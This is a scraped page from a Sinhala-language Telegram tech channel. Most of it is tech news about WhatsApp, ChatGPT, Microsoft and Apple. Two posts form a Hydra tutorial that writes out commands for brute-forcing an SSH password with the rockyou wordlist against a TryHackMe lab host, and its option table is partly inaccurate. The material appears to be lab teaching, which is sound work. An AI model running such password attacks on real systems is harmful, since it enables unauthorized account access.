fa
Feedback
🔐 SMΛЯT TΞϾH 🌿 🇱🇰 『 Ƭελϻ Ѕϻλгτ 』 ゞ™

🔐 SMΛЯT TΞϾH 🌿 🇱🇰 『 Ƭελϻ Ѕϻλгτ 』 ゞ™

کانال بسته

ඔයත් කැමතිද අලුත්ම තාක්ෂණ ක්‍රමයන්ගේ විස්තර දැනගන්න.ඒනම් අදම එක්වන්න SMΛЯT TΞϾH 🇱🇰 TechNology ChaNnel එකට. මොනවද මේ හැකින් කියන්නේ ඔයත් කැමති ද දැනගන්න. නොමිලේම පරිඝනක භාෂා ඉගෙනගන්න කැමති ද..? Technology FlatForm වල විස්තර කියවන්න. 🌿 sɪɴᴄᴇ 2023/01/01

نمایش بیشتر
1 599
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
آرشیو پست ها
Status Reactions මේ නව Status Reactions සමගින් ඔබට ඉතා ඉක්මනින් සහ පහසුවෙවෙන් Status එකක් සදහා ප්‍රතිචාර දැක්විමේ හැකියාව හිමි වෙනවා. මේ සදහා තොරාගත් Emojis 08 ක් ලබා දී තිබෙනවා. Status Profile Rings for New Updates Profile එක වටේට තිබෙන කොළ පැහැයට හුරැ Ring එක ඔස්සේ නව Status එකක් Post කළ පසු එය අපේ Chat Screen එක ඔස්සේම දැන ගැනිමේ හැකියාව මේ ඔස්සේ හිමි වෙනවා. මීට අමතරව මෙය Chat list එකේ, Group Participant Lists වල සහ Contact infoවල බලා ගැනිමට හැකියාව ලැබෙනවා. Private Audience Selector මේ පහසුකම ඔස්සේ ඔබ Status එකක් Post කරන අවස්ථාවේදීම ඔබට එම Status එක දැකිය යුත්තේ කවුදැයි යන්න Select කළ හැකි වනවා. Voice Status මේ මගින් ඔබට තත්පර 30ක Voice Note එකක් Status මගින් බෙදා ගත හැකි වනවා. Link Preview on Status ඔබ විසින් යම් Link එකක් Status ඔස්සේ පළ කර විට එම Link එකට අදාල Visual Preview එක Automatically Preview කිරිමේ හැකියාව මේ තුළින් ලැබෙනවා. මෙම Features සියල්ලම මේ වන විටත් WhatsApp Stable Version එක සදහා ලබා දීම ආරම්භ කර තිබෙනවා. ඒ අනුව ඔබට ඔබගේ Android හෝ Apple Devices මගින් WhatsApp හි නවතම සංස්කරණය ඔස්සේ මේ Features සියල්ල ලබා ගැනිමේ හැකියාව තිබෙනවා. . . . <!- - 🔐 SMΛЯT TΞϾH 🌿 🇱🇰 『 Ƭελϻ Ѕϻλгτ 』 ゞ™ - -> Copyright © 2023 SMΛЯT TΞϾH 🇱🇰 『 Ƭελϻ Ѕϻλгτ 』 ゞ™

WhatsApp Status සඳහා නව විශේෂාංග 5ක් එක කිරීමට Meta ආයතනය කටයුතු කර​යි ලොව ජනප්‍රියතම Messaging App එක ලෙස නම් දරා සිටින What
WhatsApp Status සඳහා නව විශේෂාංග 5ක් එක කිරීමට Meta ආයතනය කටයුතු කර​යි ලොව ජනප්‍රියතම Messaging App එක ලෙස නම් දරා සිටින WhatsApp හි ඔබ කැමතිම Feature එක කුමක්දැයි ඇසුවොත් ඔබ සැම දෙන පිළිතුර Status පහසුකම බව අමුතුවෙන් දැක්විය යුතු නොමැති වනවා. බොහෝ දෙනෙකු WhatsApp අතහැර වෙනත් Messaging App සදහා මාරැ විමට මැලිකමක් දැක්වීමටත් ප්‍රධාන හේතුව මෙය බව නිසකයි. WhatsApp හි නිල Blog අඩවිය විසින් ඔවුන්ගේ Blog Post එකක් හරහා නිවේදනය කර සිටින්නේ WhatsApp Status පහසුකම සදහා නව විශේෂාංග 05ක් හදුන්වා දි ඇති බවයි. එමෙන්ම WhatsApp හි Chats සහ Calls මෙන්ම Status සදහාත් end-to-end encryption මගින් ආරක්ෂාව ලැබෙන බව වැඩි දුරටත් දක්වා තිබෙනවා.

අද Posts ටිකක් වැඩිපුර දෙන්නම්

මේ දවස් ටිකේ Post පොඩ්ඩක් අඩු උන ඒකට Very Sorry

ඔබ දන්නවාද? මේ තියෙන්නෙ වෙන චැනල් වල දක්නට ලැබෙන අපේ චැනල් එකේ නැති දේ.🥲
ඔබ දන්නවාද? මේ තියෙන්නෙ වෙන චැනල් වල දක්නට ලැබෙන අපේ චැනල් එකේ නැති දේ.🥲

Adobe Reader Shortcuts 🔐 SMΛЯT TΞϾH 🔐 🇱🇰 『 Ƭελϻ Ѕϻλгτ 』 ゞ™.pdf

Want Adobe After Reader ShortCuts Want Reactions 😙

Part 02 ( Practical ) 📡 How To Hydra Tool <3👀 හායි මයි ඩියර් ෆ්‍රෙන්ස් .. ගුම් මොර්නින්ග් කලින් දැම්ම ගැන විස්තරයක් බැලුවේ නැත්තම් බලහම් ,😾 අල්ලන්න එපාහ් ( Don't Thouch) 🫡 මිරිකපම් මේක ( Thouch Me) 🤨 මෙහෙමයි Hydra ටූල් එක යූස් කරන්න BruteForceවලට කියල දන්නවනේ...🫵 ඒත් කරන විදිහ දන්නේ නැද්ද ? කියවහම් දිගටම 💪[+] මම මේකට SSH එකක් ගන්නවා Username දන්න හැබැයි Password නොදන්න එකක් ( SSH Credit To TryHackMe 🤖) මේකේ පාස්වර්ඩ් එක හොයාගන්න යොදාන්න දේවල් 👇
1.Hydra
2.Vip Wordlist

සිග්නල් මත Bruteforcing ස්පීඩ් එක රදා පවතී. ( Isp Provider - Dialog අනාගතේ මගේ අතේ ) දැන් මම ඉන්ග්‍රිරීසි වලිම් ලියම්නම්. ( ඉන්ග්‍රිසී බැරි බව කරැණාවෙන් සළකන්න😥🥺. ) # First We Talk to Hydra - Using This Cmd ( ඇහැරපම් Hydra ) 🤑 $hydra #Then we say To Hydra,This SSH's Username is "Jan"
$hydra -l jan 

#after We say to Hydra , We Dont Have It's password but We Have Wordlist $hydra -l jan -w { wordlist path ) ex:- $hydra -l jan -w /home/mars11/woardlist/rockyou.txt #Then We say to Hydra , It's Host Is 10.10.10.255
$hydra -l jan -w {wordlist path} {Host Ip Address}

ex:-hydra -l jan -w /home/mars11/woardlist/rockyou.txt ssh://10.10.10.255

#Finally We Say to Hydra use this options -v and -t 4
hydra -l jan -w /home/mars11/woardlist/rockyou.txt ssh://10.10.10.255 -t 4 -vV 

**We Got The Password** 🥳😱 Hydra Cmd ()
Option              Description 
__________________________________

-l                  Single Username
-P                  indicate use the Following Password
-t                  Specifs The number Of threads To use
-V                  Verbose output for every Attempt 
-w                  Path of Wordlist

මම - (මහදැනමුත්තාXxX) 🥸 Credits - (මහදැනමුත්තාXxX) 🥸

මෙහිදී මූලිකවම සිදුවන්නේ Microsoft සමාගම සිය පාරිභෝගිකයින් සමග සම්බන්ධ වීම සඳහා සහ සිය ප්‍රචාරණ කටයුතු සිදුකිරීමයි. මෙහිදී තම
මෙහිදී මූලිකවම සිදුවන්නේ Microsoft සමාගම සිය පාරිභෝගිකයින් සමග සම්බන්ධ වීම සඳහා සහ සිය ප්‍රචාරණ කටයුතු සිදුකිරීමයි. මෙහිදී තම පරිශීලකයන් වෙතින් ලබාගන්නා දත්ත මත පදනම්ව දැනුවත් කිරීම් සිදුකිරීමට නියමිත වන අතර එහිදී විවිධාකාරයේ වී ප්‍රවර්ධනය කිරීම් ද සිදුවනු ඇත. එමෙන්ම මෙම පහසුකම Microsoft වෙතින් හඳුන්වා දී තිබූ Viva Sales වෙතටද එක් කිරීමට යෝජිත අතර එමනිසා තම පාරිභෝගිකයන් කළමණාකරණය කිරීම සහ මෙම AI තාක්ෂණය භාවිතයෙන් එම පරිශීලකයන්ගේ ඇමතුම් හා email පණිවුඩ Scan කිරීම ද සිදුකරනු ලබයි. මෙලෙස AI තාක්ෂණය භාවිතා කරනු ලබන ChatGPT වැනි යෙදුම් Microsoft සමාගම මගින් භාවිතා කිරීම ඉදිරියේදී තම පාරිභෝගිකයන් වෙත නව අත්දැකීම් සමුදායක් ලබාදීම සඳහා ඉවහල් වන බව පැහැදිලිය. එමෙන්ම Microsoft සමාගම OpenAI සමග ඇතිකරගෙන තිබූ ගිවිසුම තවදුරටත් දීර්ඝ කිරීම ඔස්සේ බොහෝ විචාරකයන් මත පළ කරනුයේ ඉදිරියේදී නව පහසුකම් රාශියක් මේ ඔස්සේ පරිශීලකයන් වෙත ලැබෙනු බවයි.

අනෙකුත් යෙදවුම් ගැන සැලකූවොත් මෑත කාලයේදී විශාල ජනප්‍රියතාවයකට පත් වූ TikTok යෙදවුමට එම ඉලක්කය වෙත යාමට මාස නවයක කාලයක් ගත වූ
අනෙකුත් යෙදවුම් ගැන සැලකූවොත් මෑත කාලයේදී විශාල ජනප්‍රියතාවයකට පත් වූ TikTok යෙදවුමට එම ඉලක්කය වෙත යාමට මාස නවයක කාලයක් ගත වූ බවත් Instagram හට වසර දෙකකට අධික කාලයක් ගතවූ බවත් සඳහන් වෙනවා. මේ නිසා එතෙක් මෙතෙක් කෙටිම කාලයක් තුළ වැඩිම පරිශීලක සංඛ්‍යාවක් පරිශීලනය කළ යෙදවුම බවට ChatGPT පත් වන බව සඳහන් කළ යුතුය. එසේම පසුගිය දිනෙක සඳහන් වූයේ Microsoft සමාගම විසින් AI තාක්ෂණය භාවිතා කර සිය සමාගමේ ප්‍රචාරණ කටයුතු සිදුකර ගැනීමට සූදානම් වන බවයි. මේ සඳහා ChatGPT වැනි යෙදවුමට සමාන යෙදවුමක් හෝ තාක්ෂණයක් භාවිතා කිරීමට නියමිත බවට පුවත් පැතිර ගියත් අවසානයේදී ප්‍රකාශ වූයේ Microsoft සමාගම ChatGPT භාවිතා කර සිය සමාගමේ වෙළඳ ප්‍රචාරණ කටයුතු ආරම්භ කිරීමට සූදානම් වන බවයි.

ලොව වේගයෙන්ම ව්‍යාප්ත වූ යෙදවුම බවට පත් වූ ChatGPT සේවාව Microsoft වෙතින් නුදුරේදීම ඔබ වෙතට ❤️‍🔥 OpenAI සමාගම විසින් නිර්මාණ
ලොව වේගයෙන්ම ව්‍යාප්ත වූ යෙදවුම බවට පත් වූ ChatGPT සේවාව Microsoft වෙතින් නුදුරේදීම ඔබ වෙතට ❤️‍🔥 OpenAI සමාගම විසින් නිර්මාණය කර නිකුත් කළ ChatGPT යෙදවුම මේ වන විට ලොව පුරා පරිශීලකයන් මිලියන 100කට අධික ප්‍රමාණයක් භාවිතා කරන බවට සනාථ වී තිබෙනවා. මිලියන 100කට වැඩි පරිශීලකයන් සිටින් තවත් යෙදවුම් තිබුණත් ChatGPT විශේෂ වන්නේ මෙම ඉලක්කය සපුරා ගැනීමට ගතවූයේ මාස තුනකට අඩු කාලයක් වීම නිසාවෙනි.

ඔන්න එහෙනම් ඔයාල කැමති නැති හින්ද Cross Promotion මේකේ දාන්නේ නෑ ❌

අපේ Channel එකේ Cross Promotion කරනවට ඔයාල කැමතිද
Anonymous voting

ඔබ දැන සිටියාද ඔබට වටින වැදගත් වෙන ටෙලිග්‍රෑම් පෝස්ට්වලට රියැක්ට් (React) ««««....❤️😇🤩❤️‍🔥⚡️..... »»» කිරීමෙන් එහි කර්තෘට හා අනෙකුත් සමාජිකයන්ගේ ආත්මතෘප්තිය වැඩි වෙන බව🫰😁

Part 01 ( Walkthrough) #1.What is Hydra? Hydra කියන්නේ Brute Force කරන්න හොද ටූල් එකක් . ඇයි මේක් හොද වෙන්නෙ ඇයි වෙන ටූල් නැද්ද > තියෙනවා 😌 *Nmap *Metasploitable *BrupSuit *ETC. කොහොම වුනත් මේවට වඩා Hydra හොදයි මොකද BruteForcing වල ස්පීඩ් එක වැඩී. 😎🤓 2#.Brute Force මොනාටද කරන්න පුලුවන් ? Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Special - SSH,HTTP-FROM-POST 🤩 3#.Installing Hydra Kali,Parrot වගේ Os වල Inbuild Install කරල එනවා Hydra Tool Eka . Git Hub LInk 📡 - Hydra 👇 4#.SUPPORTED PLATFORMS ------------------- - All UNIX platforms (Linux, *BSD, Solaris, etc.) - MacOS (basically a BSD clone) - Windows with Cygwin (both IPv4 and IPv6) - Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq) 5#.Usage Basic $ hydra -h $ ./hydra -h වීඩියෝ එකක් ගෙන්නම් ඉස්සරහට ප්‍රෑක්ටිකල් <3 🥳 මම - JANIDUXxX 😎👽

ලොව පුරා සක්‍රීය Apple Devices ප්‍රමාණය බිලියන 2 ඉක්මවන බව Apple සමාගම නිවේදනය කර​යි මේ වන විට ලොව පුරා Apple Devices (iPhone
ලොව පුරා සක්‍රීය Apple Devices ප්‍රමාණය බිලියන 2 ඉක්මවන බව Apple සමාගම නිවේදනය කර​යි මේ වන විට ලොව පුරා Apple Devices (iPhones, iPads, Macs) බිලියන දෙකකට අධික ප්‍රමාණයක් සක්‍රීයව තිබෙන බවට නවතම වාර්තා සඳහන් කරනවා. මෙය 2020 වසරේ බිලියන 1.5ක අගයක් පැවති අතර 2016 වසරේ බිලියන 1ක අගයක් පැවතුණි. මේ අතරින් පෙනෙනුයේ මෙම අගය කාලයත් සමඟ ඉතා සීඝ්‍රයෙන් වැඩිවූ බවත් ය. ඔයාලගේ කැමැත්තට අනුව පොඩි පොස්ට් එකක් 🥹

ඔයාලට අපි දැන් react 58 ක් ම දීලා තියෙන්නේ ..හැමෝම එක ගානෙ දාගෙන යන්න ඔක්කොම...😁🙊

Photoshop Pro ලා ඉන්නවද 😊